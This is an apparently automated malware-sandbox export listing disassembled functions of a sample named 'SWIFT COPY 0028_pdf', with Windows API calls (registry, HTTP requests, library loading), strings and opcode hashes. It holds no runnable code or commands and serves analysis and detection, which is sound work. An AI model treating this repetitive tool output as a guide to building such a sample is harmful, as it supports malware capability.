                                                                                    • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                    • API String ID: 2125237772-557222456
                                                                                    • Opcode ID: d19d85bd394ff67056b8f7c7768f95b44042e5c68fa5aa16b0a99102e3d615b3
                                                                                    • Instruction ID: 283fcb3ab5b8fea66b9bd39e3a865e6d08d42c60c705bc2be291d1936faacf97
                                                                                    • Opcode Fuzzy Hash: d19d85bd394ff67056b8f7c7768f95b44042e5c68fa5aa16b0a99102e3d615b3
                                                                                    • Instruction Fuzzy Hash: 41917EB1108211AFCB24EF28DC95D6EB7A8BFD5700F01491DF895972A5DB30ED44CB92
                                                                                    APIs
                                                                                    • VariantInit.OLEAUT32(?), ref: 0097B006
                                                                                    • CharUpperBuffW.USER32(?,?), ref: 0097B115
                                                                                    • VariantClear.OLEAUT32(?), ref: 0097B298
                                                                                      • Part of subcall function 00969DC5: VariantInit.OLEAUT32(00000000), ref: 00969E05
                                                                                      • Part of subcall function 00969DC5: VariantCopy.OLEAUT32(?,?), ref: 00969E0E
                                                                                      • Part of subcall function 00969DC5: VariantClear.OLEAUT32(?), ref: 00969E1A
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                    • API String ID: 4237274167-1221869570
                                                                                    • Opcode ID: ebc94089020e26a28b6a80852bf55b2c10bbfc231462e1471be5c8061bdba8f8
                                                                                    • Instruction ID: b43275d9a8efab86a827d617b1c1b10b25a0e799e929825dc1df1020e577ec1d
                                                                                    • Opcode Fuzzy Hash: ebc94089020e26a28b6a80852bf55b2c10bbfc231462e1471be5c8061bdba8f8
                                                                                    • Instruction Fuzzy Hash: 6A915C716083019FCB10DF24D495A5EB7E8EFC9704F04886EF89A9B3A2DB31E945CB52
                                                                                    APIs
                                                                                      • Part of subcall function 0093C6F4: _wcscpy.LIBCMT ref: 0093C717
                                                                                    • _memset.LIBCMT ref: 00965438
                                                                                    • GetMenuItemInfoW.USER32(?), ref: 00965467
                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00965513
                                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0096553D
                                                                                    Similarity
                                                                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                    • String ID: 0
                                                                                    • API String ID: 4152858687-4108050209
                                                                                    • Opcode ID: 5b0aeddf0884892b2d24279f4dbcd8c0f739c8bd7f8c803657ac725430bff845
                                                                                    • Instruction ID: 0f1a79163f05355deab27b78690e419c7346d422543430fd47862c11f84e907f
                                                                                    • Opcode Fuzzy Hash: 5b0aeddf0884892b2d24279f4dbcd8c0f739c8bd7f8c803657ac725430bff845
                                                                                    • Instruction Fuzzy Hash: 5C5103716187019BD7159F28C849BABB7ECEF85750F050A2EF896D32A0DB70CD448B92
                                                                                    APIs
                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0096027B
                                                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 009602B1
                                                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 009602C2
                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00960344
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                    • String ID: DllGetClassObject
                                                                                    • API String ID: 753597075-1075368562
                                                                                    • Opcode ID: 0244c2558bf37107f881818d664bb0972a7f3d055bbeff11c44bb6885de75e1c
                                                                                    • Instruction ID: cd2f617b8c37907f9182d78ffe35f1996fb10eaf7ff93533eb00262f7aed9426
                                                                                    • Opcode Fuzzy Hash: 0244c2558bf37107f881818d664bb0972a7f3d055bbeff11c44bb6885de75e1c
                                                                                    • Instruction Fuzzy Hash: 0A418BB1A04208EFDB15CF54C8C4B9B7BB9EF85311F1484A9E9099F206D7B4DA44CBA0
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00965075
                                                                                    • GetMenuItemInfoW.USER32 ref: 00965091
                                                                                    • DeleteMenu.USER32(00000004,00000007,00000000), ref: 009650D7
                                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,009E1708,00000000), ref: 00965120
                                                                                    Similarity
                                                                                    • API ID: Menu$Delete$InfoItem_memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 1173514356-4108050209
                                                                                    • Opcode ID: 22d8b3ba78b7916a2ba4d1fff6b2e63b44cbadcf3b9006794daed908411894df
                                                                                    • Instruction ID: db4037346efcda71d6c01612f6543bc3517970e4aad98809a24704a195f4749a
                                                                                    • Opcode Fuzzy Hash: 22d8b3ba78b7916a2ba4d1fff6b2e63b44cbadcf3b9006794daed908411894df
                                                                                    • Instruction Fuzzy Hash: E141C2712097019FD720DF24D884F6AB7E8AF8A324F164A1EF99697391D730E904CB62
                                                                                    APIs
                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0096E742
                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 0096E768
                                                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0096E78D
                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0096E7B9
                                                                                    Similarity
                                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                    • String ID: p1#v`K$v
                                                                                    • API String ID: 3321077145-1068180069
                                                                                    • Opcode ID: 4924e8f61a33f798fcded5829ddfd6b67626570143c86bbeee88884dcd055224
                                                                                    • Instruction ID: b124a481c14c031677e6c11cf21d25f58f278c2b5b7160a05f33645200b34a80
                                                                                    • Opcode Fuzzy Hash: 4924e8f61a33f798fcded5829ddfd6b67626570143c86bbeee88884dcd055224
                                                                                    • Instruction Fuzzy Hash: B5412439600620DFCF15EF15C484A4DBBE5BF99720F198498E946AB3A2CB34FD01DB95
                                                                                    APIs
                                                                                    • CharLowerBuffW.USER32(?,?,?,?), ref: 00980587
                                                                                    Similarity
                                                                                    • API ID: BuffCharLower
                                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                                    • API String ID: 2358735015-567219261
                                                                                    • Opcode ID: 8a2cdd4f6a5074cbcc760ddc196d522ac1d3c3fea02568e5cc44818d9c3aed5a
                                                                                    • Instruction ID: d30c85fbc20317b7a421e7098cb6571ae904d13e1b412eae32302fdbdd92f568
                                                                                    • Opcode Fuzzy Hash: 8a2cdd4f6a5074cbcc760ddc196d522ac1d3c3fea02568e5cc44818d9c3aed5a
                                                                                    • Instruction Fuzzy Hash: 2B31C370500216AFCF10EF54DC41AEEB3B8FF95314B108A2AE866A77D1EB71E915CB90
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0095B88E
                                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0095B8A1
                                                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 0095B8D1
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 3850602802-1403004172
                                                                                    • Opcode ID: cebd6a22d1ce2dfc3515b6221d61898b963813f1de5d4acf952694c13fbb259c
                                                                                    • Instruction ID: 108816570b4e909520ab9856f26486104fb0b75caf51549f74389e3a25aec985
                                                                                    • Opcode Fuzzy Hash: cebd6a22d1ce2dfc3515b6221d61898b963813f1de5d4acf952694c13fbb259c
                                                                                    • Instruction Fuzzy Hash: AB2105B1900108BFDB14EB65D886EFE777CDF95355F104129F922A71E0DB784D0A9B60
                                                                                    APIs
                                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00974401
                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00974427
                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00974457
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0097449E
                                                                                      • Part of subcall function 00975052: GetLastError.KERNEL32(?,?,009743CC,00000000,00000000,00000001), ref: 00975067
                                                                                    Similarity
                                                                                    • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                    • String ID:
                                                                                    • API String ID: 1951874230-3916222277
                                                                                    • Opcode ID: e56c3620aaab1fdf1f663be4f88636f9b5fc6a09e4c694147bf637734d2608fe
                                                                                    • Instruction ID: 63a050c5710e173dcf84266cf18bfc0cce145aedb987d7d62c05a5cc43b90a40
                                                                                    • Opcode Fuzzy Hash: e56c3620aaab1fdf1f663be4f88636f9b5fc6a09e4c694147bf637734d2608fe
                                                                                    • Instruction Fuzzy Hash: 64217CB2604208BEEB119F648C85FBBB6ECEF89758F11C41AF10E92151EB748D05A7B1
                                                                                    APIs
                                                                                      • Part of subcall function 0093D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0093D1BA
                                                                                      • Part of subcall function 0093D17C: GetStockObject.GDI32(00000011), ref: 0093D1CE
                                                                                      • Part of subcall function 0093D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0093D1D8
                                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0098915C
                                                                                    • LoadLibraryW.KERNEL32(?), ref: 00989163
                                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00989178
                                                                                    • DestroyWindow.USER32(?), ref: 00989180
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                    • String ID: SysAnimate32
                                                                                    • API String ID: 4146253029-1011021900
                                                                                    • Opcode ID: dfbd61f1355b6ce7e2e3d4921dc96f4e510cfbc460a75099cee1c8b12bd75576
                                                                                    • Instruction ID: 836ca86882bd528fa7e3c231fa5ebd85caf23bc54a14c6e4d0b48e79ae4ae649
                                                                                    • Opcode Fuzzy Hash: dfbd61f1355b6ce7e2e3d4921dc96f4e510cfbc460a75099cee1c8b12bd75576
                                                                                    • Instruction Fuzzy Hash: 0021A17121C206BBEF106F64DC88FBB37ADEF9A364F180619F915A2290C731DC41A760
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00969588
                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 009695B9
                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 009695CB
                                                                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00969605
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateHandle$FilePipe
                                                                                    • String ID: nul
                                                                                    • API String ID: 4209266947-2873401336
                                                                                    • Opcode ID: 88e01c0c186173f1ba0a7983516b0d4fedb83a594bd1b57dda96bcb4bc7424d7
                                                                                    • Instruction ID: a1e46f32ad2ae2aaaf855e1439736d4eff939486244e30505f375444ba4f3f00
                                                                                    • Opcode Fuzzy Hash: 88e01c0c186173f1ba0a7983516b0d4fedb83a594bd1b57dda96bcb4bc7424d7
                                                                                    • Instruction Fuzzy Hash: 2A216D70600205ABEB219F29DC45A9E7BFCAF85724F204A19FDA2D72E0D770D945DB60
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00969653
                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00969683
                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00969694
                                                                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 009696CE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateHandle$FilePipe
                                                                                    • String ID: nul
                                                                                    • API String ID: 4209266947-2873401336
                                                                                    • Opcode ID: 03119b559ba1782c5195065e0c228ec25ef3473f042ae825027378e836b53330
                                                                                    • Instruction ID: 04e00308a97ba4645fbc15b742e98e37a37e111656dcca2303ae546b3facf2dd
                                                                                    • Opcode Fuzzy Hash: 03119b559ba1782c5195065e0c228ec25ef3473f042ae825027378e836b53330
                                                                                    • Instruction Fuzzy Hash: DB217C71600305ABDB209F69DC44F9AB7ECAF85724F200A19FCA1E72E0EB709845DB61
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0096DB0A
                                                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0096DB5E
                                                                                    • __swprintf.LIBCMT ref: 0096DB77
                                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,009BDC00), ref: 0096DBB5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                                                    • String ID: %lu
                                                                                    • API String ID: 3164766367-685833217
                                                                                    • Opcode ID: 92bcc42fec1187b8df207de5c30b8431ad2a41811ba95fa4aee92e65ec7edf34
                                                                                    • Instruction ID: 548dc0d04ea26d5083ed710b91989e13c44827018d6a3775c0adc2368a013a76
                                                                                    • Opcode Fuzzy Hash: 92bcc42fec1187b8df207de5c30b8431ad2a41811ba95fa4aee92e65ec7edf34
                                                                                    • Instruction Fuzzy Hash: F1218775A00108AFCB10EF65DD85EEEBBB8EF89704B104069F505DB351DB71EA41DB61
                                                                                    APIs
                                                                                      • Part of subcall function 0095C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0095C84A
                                                                                      • Part of subcall function 0095C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0095C85D
                                                                                      • Part of subcall function 0095C82D: GetCurrentThreadId.KERNEL32 ref: 0095C864
                                                                                      • Part of subcall function 0095C82D: AttachThreadInput.USER32(00000000), ref: 0095C86B
                                                                                    • GetFocus.USER32 ref: 0095CA05
                                                                                      • Part of subcall function 0095C876: GetParent.USER32(?), ref: 0095C884
                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0095CA4E
                                                                                    • EnumChildWindows.USER32(?,0095CAC4), ref: 0095CA76
                                                                                    • __swprintf.LIBCMT ref: 0095CA90
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                                    • String ID: %s%d
                                                                                    • API String ID: 3187004680-1110647743
                                                                                    • Opcode ID: db6a4a75218ef4d303079b40f9c30c4c9bd095be5dd9fadd949ad94be7d1a26f
                                                                                    • Instruction ID: 7c857f6a9906bc4f8a258d6ecc1ce3a2c99d34ed6d97ae17b164a421ee883b60
                                                                                    • Opcode Fuzzy Hash: db6a4a75218ef4d303079b40f9c30c4c9bd095be5dd9fadd949ad94be7d1a26f
                                                                                    • Instruction Fuzzy Hash: 491181B16003097BCF11FFA19C89FE93B6CAF85715F008066FE19AA186DB749549DB70
                                                                                    APIs
                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 009819F3
                                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00981A26
                                                                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00981B49
                                                                                    • CloseHandle.KERNEL32(?), ref: 00981BBF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                    • String ID:
                                                                                    • API String ID: 2364364464-0
                                                                                    • Opcode ID: ea14927d8014ce97d0abd67a409116652b156e3d0a55e74d1109ad073a7b5162
                                                                                    • Instruction ID: d8bd0cbfa3ec679c27348e491a24da902c8b9cb5600cd922cae6a2910f606b72
                                                                                    • Opcode Fuzzy Hash: ea14927d8014ce97d0abd67a409116652b156e3d0a55e74d1109ad073a7b5162
                                                                                    • Instruction Fuzzy Hash: 9A815F70600214ABDF14AF64C886BADBBF9AF48720F148499F905AF396D7B5E941CF90
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0098E1D5
                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0098E20D
                                                                                    • IsDlgButtonChecked.USER32(?,00000001), ref: 0098E248
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0098E269
                                                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0098E281
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$ButtonCheckedLongWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3188977179-0
                                                                                    • Opcode ID: c263000e39f766bf19da847f5285b1b7c01a6d458d11c3d3e8a85252d78d165f
                                                                                    • Instruction ID: e6e7a204747f8fb4ffe71ffdaf63cedfd8bd7cc16312a89c65529c07a13d7a6b
                                                                                    • Opcode Fuzzy Hash: c263000e39f766bf19da847f5285b1b7c01a6d458d11c3d3e8a85252d78d165f
                                                                                    • Instruction Fuzzy Hash: C861A034A08244AFDB25EF58C8A9FAA77FEEF89300F144459F95A973A1C775AD40CB10
                                                                                    APIs
                                                                                    • VariantInit.OLEAUT32(?), ref: 00961CB4
                                                                                    • VariantClear.OLEAUT32(00000013), ref: 00961D26
                                                                                    • VariantClear.OLEAUT32(00000000), ref: 00961D81
                                                                                    • VariantClear.OLEAUT32(?), ref: 00961DF8
                                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00961E26
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$Clear$ChangeInitType
                                                                                    • String ID:
                                                                                    • API String ID: 4136290138-0
                                                                                    • Opcode ID: 1dea835f3654d8750a86c108b76cc1b2ba11999ac17f2892befde4744f0168a6
                                                                                    • Instruction ID: cb99da6ce3b1f80d872758d5071194699a4c524a83bdd57ea636a632c019ea76
                                                                                    • Opcode Fuzzy Hash: 1dea835f3654d8750a86c108b76cc1b2ba11999ac17f2892befde4744f0168a6
                                                                                    • Instruction Fuzzy Hash: 085148B5A00209EFDB14CF58C890AAAB7F8FF4D314B198559E959DB350E330EA51CFA0
                                                                                    APIs
                                                                                      • Part of subcall function 0092936C: __swprintf.LIBCMT ref: 009293AB
                                                                                      • Part of subcall function 0092936C: __itow.LIBCMT ref: 009293DF
                                                                                    • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 009806EE
                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0098077D
                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0098079B
                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 009807E1
                                                                                    • FreeLibrary.KERNEL32(00000000,00000004), ref: 009807FB
                                                                                      • Part of subcall function 0093E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0096A574,?,?,00000000,00000008), ref: 0093E675
                                                                                      • Part of subcall function 0093E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0096A574,?,?,00000000,00000008), ref: 0093E699
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                    • String ID:
                                                                                    • API String ID: 327935632-0
                                                                                    • Opcode ID: 5247f0edab226531765875d1f3f7e33291759bab4f23c29c4f8d886de627c9d7
                                                                                    • Instruction ID: e00dbbfb99d907890daaf1d3fe56061f692b5d03af9ac29e75ff278b5711f91c
                                                                                    • Opcode Fuzzy Hash: 5247f0edab226531765875d1f3f7e33291759bab4f23c29c4f8d886de627c9d7
                                                                                    • Instruction Fuzzy Hash: CB515C75A01215DFCB04EFA8D885EADB7B5BF89310F048059E916AB352DB30EE45CF90
APIs
  • Part of subcall function 00983C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00982BB5,?,?), ref: 00983C1D
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00982EEF
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00982F2E
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00982F75
• RegCloseKey.ADVAPI32(?,?), ref: 00982FA1
• RegCloseKey.ADVAPI32(00000000), ref: 00982FAE
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpper
• String ID:
• API String ID: 3740051246-0
• Opcode ID: bf09a4167860af788e59490f6510a8bbdce7188214fed53f4962dca74d2f9651
• Instruction ID: 99513d7a9025fbf81d331dc156990b946c2d4f95293063e6637707a7f756ffea
• Opcode Fuzzy Hash: bf09a4167860af788e59490f6510a8bbdce7188214fed53f4962dca74d2f9651
• Instruction Fuzzy Hash: 19513871208204AFD704EF64D891F6EB7F9BF88714F04891DF696972A1DB34E905CB52
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8cd4b3f75a273e4f1e11940769cf20f1049971553a213b1f26f1ddc6e8b6a559
